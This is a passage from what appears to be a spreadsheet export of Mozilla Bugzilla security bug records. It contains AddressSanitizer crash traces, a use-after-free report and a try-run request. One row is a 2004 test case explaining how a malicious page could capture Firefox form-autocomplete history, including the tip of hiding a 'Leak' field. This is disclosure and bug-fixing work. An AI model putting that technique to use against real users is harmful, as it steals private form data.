		#13 0x7fa30146cfe7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:308:3
		#14 0x7fa30146cfe7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:290:3
		#15 0x7fa307562ff8 in nsBaseAppShell::Run() /builds/worker/checkouts/gecko/widget/nsBaseAppShell.cpp:137:27
		#16 0x7fa30aafa5bb in nsAppStartup::Run() /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:271:30
		#17 0x7fa30ad00546 in XREMain::XRE_mainRun() /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4614:22
		#18 0x7fa30ad023b1 in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4749:8
		#19 0x7fa30ad030f3 in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /builds/worker/checkouts/gecko/toolkit/xre/nsAppRunner.cpp:4800:21
		#20 0x55b6994b8726 in do_main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:217:22
		#21 0x55b6994b8726 in main /builds/worker/checkouts/gecko/browser/app/nsBrowserApp.cpp:331:16
		#22 0x7fa319d851e2 in __libc_start_main /build/glibc-t7JzpG/glibc-2.30/csu/../csu/libc-start.c:308:16
	previously allocated by thread T46 (IPDL Background) here:
		#0 0x55b699485b0d in malloc /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:145:3
		#1 0x55b6994bb4fd in moz_xmalloc /builds/worker/checkouts/gecko/memory/mozalloc/mozalloc.cpp:52:15
		#2 0x7fa306effc46 in operator new /builds/worker/workspace/obj-build/dist/include/mozilla/cxxalloc.h:33:10
		#3 0x7fa306effc46 in mozilla::dom::SharedWorkerService::GetOrCreate() /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerService.cpp:126:42
		#4 0x7fa306effa77 in mozilla::dom::SharedWorkerParent::Initialize(mozilla::dom::RemoteWorkerData const&amp;, unsigned long, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/dom/workers/sharedworkers/SharedWorkerParent.cpp:50:41
		#5 0x7fa3014c45aa in mozilla::ipc::BackgroundParentImpl::RecvPSharedWorkerConstructor(mozilla::dom::PSharedWorkerParent*, mozilla::dom::RemoteWorkerData const&amp;, unsigned long const&amp;, mozilla::dom::MessagePortIdentifier const&amp;) /builds/worker/checkouts/gecko/ipc/glue/BackgroundParentImpl.cpp:552:10
		#6 0x7fa301c6538f in mozilla::ipc::PBackgroundParent::OnMessageReceived(IPC::Message const&amp;) /builds/worker/workspace/obj-build/ipc/ipdl/PBackgroundParent.cpp:5068:28
		#7 0x7fa30153813c in mozilla::ipc::MessageChannel::DispatchAsyncMessage(mozilla::ipc::ActorLifecycleProxy*, IPC::Message const&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2187:25
		#8 0x7fa301535255 in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message&amp;&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:2111:9
		#9 0x7fa3015366cf in mozilla::ipc::MessageChannel::RunMessage(mozilla::ipc::MessageChannel::MessageTask&amp;) /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1959:3
		#10 0x7fa301536ede in mozilla::ipc::MessageChannel::MessageTask::Run() /builds/worker/checkouts/gecko/ipc/glue/MessageChannel.cpp:1990:13
		#11 0x7fa3004c58ce in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:1220:14
		#12 0x7fa3004d035c in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:481:10
		#13 0x7fa301540ec9 in mozilla::ipc::MessagePumpForNonMainThreads::Run(base::MessagePump::Delegate*) /builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp:332:5
		#14 0x7fa30146cfe7 in RunInternal /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:315:10
		#15 0x7fa30146cfe7 in RunHandler /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:308:3
		#16 0x7fa30146cfe7 in MessageLoop::Run() /builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc:290:3
		#17 0x7fa3004bf245 in nsThread::ThreadFunc(void*) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:464:10
		#18 0x7fa3169a51fe in _pt_root /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:201:5
		#19 0x7fa31a2c2668 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x9668)
	Thread T46 (IPDL Background) created by T0 here:
		#0 0x55b69947029a in pthread_create /builds/worker/fetches/llvm-project/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:209:3
		#1 0x7fa316995655 in _PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:458:14
		#2 0x7fa31698651e in PR_CreateThread /builds/worker/checkouts/gecko/nsprpub/pr/src/pthreads/ptthread.c:533:12
		#3 0x7fa3004c1c0c in nsThread::Init(nsTSubstring&lt;char&gt; const&amp;) /builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp:670:8
		#4 0x7fa3004cf251 in nsThreadManager::NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, unsigned int, nsIThread**) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadManager.cpp:621:12
		#5 0x7fa3004d3183 in NS_NewNamedThread(nsTSubstring&lt;char&gt; const&amp;, nsIThread**, nsIRunnable*, unsigned int) /builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp:139:57
		#6 0x7fa3014f4e7e in NS_NewNamedThread&lt;16&gt; /builds/worker/workspace/obj-build/dist/include/nsThreadUtils.h:65:10
		#7 0x7fa3014f4e7e in (anonymous namespace)::ParentImpl::CreateBackgroundThread() /builds/worker/checkouts/gecko/ipc/glue/BackgroundImpl.cpp:1325:7
		#8 0x7fa3014f66c4 in CreateActorForSameProcess /builds/worker/checkouts/gecko/ipc/glue/BackgroundImpl.cpp:1235:32
		#9 0x7fa3014f66c4 in ParentContentActorCreateFunc((anonymous namespace)::ChildImpl::ThreadLocalInfo*, unsigned int, nsIEventTarget*, (anonymous namespace)::ChildImpl**) /builds/worker/checkouts/gecko/ipc/glue/BackgroundImpl.cpp:864:9
		#10 0x7fa3014fefdb in (anonymous namespace)::ChildImpl::ThreadInfoWrapper::GetOrCreateForCurrentThread(nsIEventTarget*) /builds/worker/checkouts/gecko/ipc/glue/BackgroundImpl.cpp:420:7
		#11 0x7fa30573ce17 in mozilla::dom::ClientManager::ClientManager() /builds/worker/checkouts/gecko/dom/clients/manager/ClientManager.cpp:50:7
		#12 0x7fa30573f310 in mozilla::dom::ClientManager::GetOrCreateForCurrentThread() /builds/worker/checkouts/gecko/dom/clients/manager/ClientManager.cpp:212:14
		#13 0x7fa30573fd12 in mozilla::dom::ClientManager::CreateSource(mozilla::dom::ClientType, nsISerialEventTarget*, nsIPrincipal*) /builds/worker/checkouts/gecko/dom/clients/manager/ClientManager.cpp:268:31
		#14 0x7fa30a2cc552 in nsDocShell::MaybeCreateInitialClientSource(nsIPrincipal*) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:2527:26
		#15 0x7fa30a2fa1b5 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIPrincipal*, nsIContentSecurityPolicy*, nsIURI*, bool, bool, mozilla::dom::WindowGlobalChild*) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:6554:5
		#16 0x7fa30a2fba9c in CreateAboutBlankContentViewer /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp:6612:10
		#17 0x7fa30a2fba9c in non-virtual thunk to nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIPrincipal*, nsIContentSecurityPolicy*) /builds/worker/checkouts/gecko/docshell/base/nsDocShell.cpp
		#18 0x7fa30a3bdc13 in mozilla::AppWindow::Initialize(nsIAppWindow*, nsIAppWindow*, nsIURI*, int, int, bool, nsIRemoteTab*, mozIDOMWindowProxy*, nsWidgetInitData&amp;) /builds/worker/checkouts/gecko/xpfe/appshell/AppWindow.cpp:298:21
		#19 0x7fa30a3dfccb in nsAppShellService::JustCreateTopWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, bool, nsIRemoteTab*, mozIDOMWindowProxy*, mozilla::AppWindow**) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:679:25
		#20 0x7fa30a3e13c7 in nsAppShellService::CreateTopLevelWindow(nsIAppWindow*, nsIURI*, unsigned int, int, int, nsIRemoteTab*, mozIDOMWindowProxy*, nsIAppWindow**) /builds/worker/checkouts/gecko/xpfe/appshell/nsAppShellService.cpp:172:8
		#21 0x7fa30aafc911 in nsAppStartup::CreateChromeWindow(nsIWebBrowserChrome*, unsigned int, nsIRemoteTab*, mozIDOMWindowProxy*, unsigned long, bool*, nsIWebBrowserChrome**) /builds/worker/checkouts/gecko/toolkit/components/startup/nsAppStartup.cpp:634:15
		#22 0x7fa30ac75086 in nsWindowWatcher::CreateChromeWindow(nsTSubstring&lt;char&gt; const&amp;, nsIWebBrowserChrome*, unsigned int, nsIRemoteTab*, mozIDOMWindowProxy*, unsigned long, nsIWebBrowserChrome**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:424:33
		#23 0x7fa30ac72ee6 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, bool, nsDocShellLoadState*, mozilla::dom::BrowsingContext**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:910:12
		#24 0x7fa30ac6ddec in nsWindowWatcher::OpenWindow(mozIDOMWindowProxy*, char const*, char const*, char const*, nsISupports*, mozIDOMWindowProxy**) /builds/worker/checkouts/gecko/toolkit/components/windowwatcher/nsWindowWatcher.cpp:292:3
		#25 0x7fa3005085c1 in NS_InvokeByIndex /builds/worker/checkouts/gecko/xpcom/reflect/xptcall/md/unix/xptcinvoke_asm_x86_64_unix.S:106
		#26 0x7fa301ed7cfb in Invoke /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1634:10
		#27 0x7fa301ed7cfb in Call /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1175:19
		#28 0x7fa301ed7cfb in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNative.cpp:1141:23
		#29 0x7fa301edcd02 in XPC_WN_CallMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/checkouts/gecko/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:947:10
		#30 0x7fa30af3c9e7 in CallJSNative /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:476:13
		#31 0x7fa30af3c9e7 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:568:12
		#32 0x7fa30af3e69a in InternalCall(JSContext*, js::AnyInvokeArgs const&amp;, js::CallReason) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:631:10
		#33 0x7fa30af2504a in CallFromStack /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:635:10
		#34 0x7fa30af2504a in Interpret(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:3026:16
		#35 0x7fa30af0aff3 in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:448:10
		#36 0x7fa30af40998 in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::AbstractFramePtr, JS::Value*) /builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp:824:13
		#37 0x7fa30b0108ec in ExecuteInExtensibleLexicalEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;) /builds/worker/checkouts/gecko/js/src/builtin/Eval.cpp:499:10
		#38 0x7fa30b01130c in js::ExecuteInJSMEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::StackGCVector&lt;JSObject*, js::TempAllocPolicy&gt; &gt;) /builds/worker/checkouts/gecko/js/src/builtin/Eval.cpp:606:10
		#39 0x7fa30b010f62 in js::ExecuteInJSMEnvironment(JSContext*, JS::Handle&lt;JSScript*&gt;, JS::Handle&lt;JSObject*&gt;) /builds/worker/checkouts/gecko/js/src/builtin/Eval.cpp:561:10
		#40 0x7fa301dcb5db in mozJSComponentLoader::ObjectForLocation(ComponentLoaderInfo&amp;, nsIFile*, JS::MutableHandle&lt;JSObject*&gt;, JS::MutableHandle&lt;JSScript*&gt;, char**, bool, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/checkouts/gecko/js/xpconnect/loader/mozJSComponentLoader.cpp:929:19
		#41 0x7fa301dd3f8a in mozJSComponentLoader::Import(JSContext*, nsTSubstring&lt;char&gt; const&amp;, JS::MutableHandle&lt;JSObject*&gt;, JS::MutableHandle&lt;JSObject*&gt;, bool) /builds/worker/checkouts/gecko/js/xpconnect/loader/mozJSComponentLoader.cpp:1343:12
		#42 0x7fa300447f93 in mozilla::xpcom::ConstructJSMComponent(nsTSubstring&lt;char&gt; const&amp;, char const*, nsISupports**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:1586:3
		#43 0x7fa300438740 in mozilla::xpcom::CreateInstanceImpl(mozilla::xpcom::ModuleID, nsISupports*, nsID const&amp;, void**) /builds/worker/workspace/obj-build/xpcom/components/StaticComponents.cpp:11097:7
		#44 0x7fa3004754c5 in CreateInstance /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:219:46
		#45 0x7fa3004754c5 in nsComponentManagerImpl::GetServiceLocked((anonymous namespace)::MutexLock&amp;, (anonymous namespace)::EntryWrapper&amp;, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1372:17
		#46 0x7fa30046bc3e in nsComponentManagerImpl::GetServiceByContractID(char const*, nsID const&amp;, void**) /builds/worker/checkouts/gecko/xpcom/components/nsComponentManager.cpp:1559:10
		#47 0x7fa30047cfa2 in CallGetService /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:61:43
		#48 0x7fa30047cfa2 in nsGetServiceByContractIDWithError::operator()(nsID const&amp;, void**) const /builds/worker/checkouts/gecko/xpcom/components/nsComponentManagerUtils.cpp:253:21
		#49 0x7fa3002f4756 in nsCOMPtr_base::assign_from_gs_contractid_with_error(nsGetServiceByContractIDWithError const&amp;, nsID const&amp;) /builds/worker/checkouts/gecko/xpcom/base/nsCOMPtr.cpp:91:7
		#50 0x7fa30ad0e17d in operator= /builds/worker/works</t>
        </is>
      </c>
      <c r="X4012" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4013">
      <c r="A4013" t="n">
        <v>593853</v>
      </c>
      <c r="B4013" t="inlineStr">
        <is>
          <t>2010-09-06 11:49:58 -0700</t>
        </is>
      </c>
      <c r="C4013" t="inlineStr">
        <is>
          <t>Requesting try talos/test run</t>
        </is>
      </c>
      <c r="D4013" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E4013" t="n">
        <v>1</v>
      </c>
      <c r="F4013" t="n">
        <v>1</v>
      </c>
      <c r="G4013" t="n">
        <v>5</v>
      </c>
      <c r="H4013" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4013" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J4013" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4013" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L4013" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4013" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4013" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4013" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4013" t="inlineStr">
        <is>
          <t>tryrequest</t>
        </is>
      </c>
      <c r="Q4013" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4013" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4013" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4013" t="n">
        <v>1</v>
      </c>
      <c r="U4013" t="n">
        <v>0</v>
      </c>
      <c r="V4013" t="n">
        <v>2</v>
      </c>
      <c r="W4013" t="inlineStr">
        <is>
          <t>Please run zbraniecki@mozilla.com-de98422ab500 all platforms, all talos, no tests</t>
        </is>
      </c>
      <c r="X4013" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4014">
      <c r="A4014" t="n">
        <v>270697</v>
      </c>
      <c r="B4014" t="inlineStr">
        <is>
          <t>2004-11-18 15:13:32 -0800</t>
        </is>
      </c>
      <c r="C4014" t="inlineStr">
        <is>
          <t>Autocomplete data leak</t>
        </is>
      </c>
      <c r="D4014" t="inlineStr">
        <is>
          <t>2007-05-23 15:45:29 -0700</t>
        </is>
      </c>
      <c r="E4014" t="n">
        <v>1</v>
      </c>
      <c r="F4014" t="n">
        <v>1</v>
      </c>
      <c r="G4014" t="n">
        <v>2</v>
      </c>
      <c r="H4014" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4014" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4014" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4014" t="inlineStr">
        <is>
          <t>1.0 Branch</t>
        </is>
      </c>
      <c r="L4014" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4014" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4014" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4014" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4014" t="inlineStr">
        <is>
          <t>[sg:fix] have fix need SR ben, approval</t>
        </is>
      </c>
      <c r="Q4014" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4014" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4014" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4014" t="n">
        <v>1</v>
      </c>
      <c r="U4014" t="n">
        <v>0</v>
      </c>
      <c r="V4014" t="n">
        <v>23</v>
      </c>
      <c r="W4014" t="inlineStr">
        <is>
          <t>From Matt Brubeck:
Mozilla Firefox Test Case: Form Auto-completion Privacy Leak
Introduction
This test case demonstrates a way that a malicious web page can obtain data from
a user's form-fill history. This attack requires the victim to scroll through
the form auto-complete menu using the keyboard.
Test Case Instructions
   1.
      First, enter a value into the "Add data" field in Form 1. Press the submit
button. Enter and submit several more values, all beginning with the same
character (for example: "101", "184", "190").
   2.
      Type same first character into the "Test" field in Form 2. The form
auto-complete menu will appear, populated with the values entered in the
previous step.
   3.
      Press the "down arrow" key to scroll through the auto-complete menu. As
you scroll, the values you scroll past will be added to the field labeled
"Leak", and all of them will be submitted if you submit the form. (A malicious
web page would make the "Leak" field invisible, or send the captured data some
other way.)
Comments
A malicious web page could target a common field name (like "SSN"), or a field
name from a particular web site. Tricks could be used to make it more likely for
victims to scroll through the history: For example, the malicious page could ask
the user to submit a form twice with the same value, which would would appear in
the formfill history the second time. The requested value could be chosen to
appear below likely values for sensitive data.
This bug could be fixed by disabling all event handlers and timer functions
while the form-fill menu is open. Alternately, the "value" attribute of an input
field should not be updated while the user is scrolling through the form-fill menu.
Test case tested and found to work on:
    * Mozilla Firefox nightly build 20041107 (branch, Windows installer)
Not yet tested on:
    * Mozilla Seamonkey
    * Other Firefox builds or platforms
    * Other clients
[dveditz note: Seamonkey is not vulnerable, it fills forms in toto only on
request and does not have an active auto-complete feature]</t>
        </is>
      </c>
      <c r="X4014" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4015">
      <c r="A4015" t="n">
        <v>1164567</v>
      </c>
      <c r="B4015" t="inlineStr">
        <is>
          <t>2015-05-13 11:07:57 -0700</t>
        </is>
      </c>
      <c r="C4015" t="inlineStr">
        <is>
          <t>Various consumers in the tree use nsIPrincipal off-main-thread</t>
        </is>
      </c>
      <c r="D4015" t="inlineStr">
        <is>
          <t>2016-07-02 10:45:05 -0700</t>
        </is>
      </c>
      <c r="E4015" t="n">
        <v>1</v>
      </c>
      <c r="F4015" t="n">
        <v>1</v>
      </c>
      <c r="G4015" t="n">
        <v>3</v>
      </c>
      <c r="H4015" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4015" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4015" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K4015" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4015" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4015" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4015" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4015" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4015" t="inlineStr">
        <is>
          <t>[adv-main39+][adv-esr31.8+][adv-esr38.1+]</t>
        </is>
      </c>
      <c r="Q4015" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4015" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4015" t="inlineStr">
        <is>
          <t>mozilla41</t>
        </is>
      </c>
      <c r="T4015" t="n">
        <v>1</v>
      </c>
      <c r="U4015" t="n">
        <v>0</v>
      </c>
      <c r="V4015" t="n">
        <v>33</v>
      </c>
      <c r="W4015" t="inlineStr">
        <is>
          <t>nsIPrincipal doesn't have threadsafe refcounting, but it also rolls its own refcounting scheme, so it doesn't presently have any ownerthread assertions either. I just added some in bug 1164292, and hit the assertion in various places.
This can lead to UAF/double-free, though we'll have to see exactly how exploitable the culprits are.</t>
        </is>
      </c>
      <c r="X4015" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4016">
      <c r="A4016" t="n">
        <v>1135511</v>
      </c>
      <c r="B4016" t="inlineStr">
        <is>
          <t>2015-02-22 08:13:09 -0800</t>
        </is>
      </c>
      <c r="C4016" t="inlineStr">
        <is>
          <t>Memset crash in mozilla::layers::BufferTextureClient::AllocateForSurface</t>
        </is>
      </c>
      <c r="D4016" t="inlineStr">
        <is>
          <t>2024-05-30 08:40:07 -0700</t>
        </is>
      </c>
      <c r="E4016" t="n">
        <v>1</v>
      </c>
      <c r="F4016" t="n">
        <v>1</v>
      </c>
      <c r="G4016" t="n">
        <v>3</v>
      </c>
      <c r="H4016" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4016" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4016" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K4016" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4016" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4016" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4016" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4016" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4016" t="inlineStr">
        <is>
          <t>[adv-main37+][fixed by bug 1135883][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4016" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4016" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4016" t="inlineStr">
        <is>
          <t>mozilla39</t>
        </is>
      </c>
      <c r="T4016" t="n">
        <v>1</v>
      </c>
      <c r="U4016" t="n">
        <v>0</v>
      </c>
      <c r="V4016" t="n">
        <v>19</v>
      </c>
      <c r="W4016" t="inlineStr">
        <is>
          <t>Created attachment 8567650
Testcase
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Attempt to create DrawTarget for invalid surface. Size(442,263984) Cairo Status: 32[GFX1]: Attempt to create DrawTarget for invalid surface. Size(442,263984) Cairo Status: 32
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Attempt to create DrawTarget for invalid surface. Size(442,263984) Cairo Status: 32|[1][GFX1]: Attempt to create DrawTarget for invalid surface. Size(442,263984) Cairo Status: 32[GFX1]: Attempt to create DrawTarget for invalid surface. Size(442,263984) Cairo Status: 32
Crash Annotation GraphicsCriticalError: |[0][GFX1]: Attempt to create DrawTarget for invalid surface. Size(442,263984) Cairo Status: 32|[1][GFX1]: Attempt to create DrawTarget for invalid surface. Size(442,263984) Cairo Status: 32|[2][GFX1]: Failed 2 buffer db=0x0 dw=0x0 for 0, 151536656, 442, 263984[GFX1]: Failed 2 buffer db=0x0 dw=0x0 for 0, 151536656, 442, 263984
ASAN:SIGSEGV
=================================================================
==9489==ERROR: AddressSanitizer: SEGV on unknown address 0x7f39c9748000 (pc 0x7f3a0b6360e0 bp 0x7fffe1dbfd50 sp 0x7fffe1dbf4d8 T0)
    #0 0x7f3a0b6360df in memset /build/buildd/eglibc-2.19/sysdeps/x86_64/memset.S:90
    #1 0x7f3a0fb55791 in mozilla::layers::BufferTextureClient::AllocateForSurface(mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::layers::TextureAllocationFlags) gfx/layers/client/TextureClient.cpp:753:5
    #2 0x7f3a0fb4315f in mozilla::layers::TextureClient::CreateForDrawing(mozilla::layers::ISurfaceAllocator*, mozilla::gfx::SurfaceFormat, mozilla::gfx::IntSizeTyped&lt;mozilla::gfx::UnknownUnits&gt;, mozilla::gfx::BackendType, mozilla::layers::TextureFlags, mozilla::layers::TextureAllocationFlags) gfx/layers/client/TextureClient.cpp:402:8
    #3 0x7f3a0fb46dc0 in mozilla::layers::ContentClientRemoteBuffer::CreateBackBuffer(nsIntRect const&amp;) gfx/layers/client/CompositableClient.cpp:211:10
    #4 0x7f3a0fb47373 in mozilla::layers::ContentClientRemoteBuffer::CreateBuffer(gfxContentType, nsIntRect const&amp;, unsigned int, mozilla::RefPtr&lt;mozilla::gfx::DrawTarget&gt;*, mozilla::RefPtr&lt;mozilla::gfx::DrawTarget&gt;*) gfx/layers/client/ContentClient.cpp:308:3
    #5 0x7f3a0fa84504 in mozilla::layers::RotatedContentBuffer::BeginPaint(mozilla::layers::PaintedLayer*, unsigned int) gfx/layers/RotatedBuffer.cpp:671:5
    #6 0x7f3a0fba79d1 in mozilla::layers::ContentClientRemoteBuffer::BeginPaintBuffer(mozilla::layers::PaintedLayer*, unsigned int) objdir-ff-asan/dist/include/mozilla/layers/ContentClient.h:223:12
    #7 0x7f3a0fb2dcf2 in mozilla::layers::ClientPaintedLayer::PaintThebes() gfx/layers/client/ClientPaintedLayer.cpp:54:5
    #8 0x7f3a0fb2ec77 in mozilla::layers::ClientPaintedLayer::RenderLayerWithReadback(mozilla::layers::ReadbackProcessor*) gfx/layers/client/ClientPaintedLayer.cpp:131:3
    #9 0x7f3a0fb38073 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:68:7
    #10 0x7f3a0fb38073 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:68:7
    #11 0x7f3a0fb38073 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:68:7
    #12 0x7f3a0fb38073 in mozilla::layers::ClientContainerLayer::RenderLayer() gfx/layers/client/ClientContainerLayer.h:68:7
    #13 0x7f3a0fb295dd in mozilla::layers::ClientLayerManager::EndTransactionInternal(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:274:3
    #14 0x7f3a0fb29c5b in mozilla::layers::ClientLayerManager::EndTransaction(void (*)(mozilla::layers::PaintedLayer*, gfxContext*, nsIntRegion const&amp;, mozilla::layers::DrawRegionClip, nsIntRegion const&amp;, void*), void*, mozilla::layers::LayerManager::EndTransactionFlags) gfx/layers/client/ClientLayerManager.cpp:317:3
    #15 0x7f3a13accd9e in nsDisplayList::PaintRoot(nsDisplayListBuilder*, nsRenderingContext*, unsigned int) layout/base/nsDisplayList.cpp:1712:3
    #16 0x7f3a13b60219 in nsLayoutUtils::PaintFrame(nsRenderingContext*, nsIFrame*, nsRegion const&amp;, unsigned int, unsigned int) layout/base/nsLayoutUtils.cpp:3199:5
    #17 0x7f3a13beb7c6 in PresShell::Paint(nsView*, nsRegion const&amp;, unsigned int) layout/base/nsPresShell.cpp:6359:5
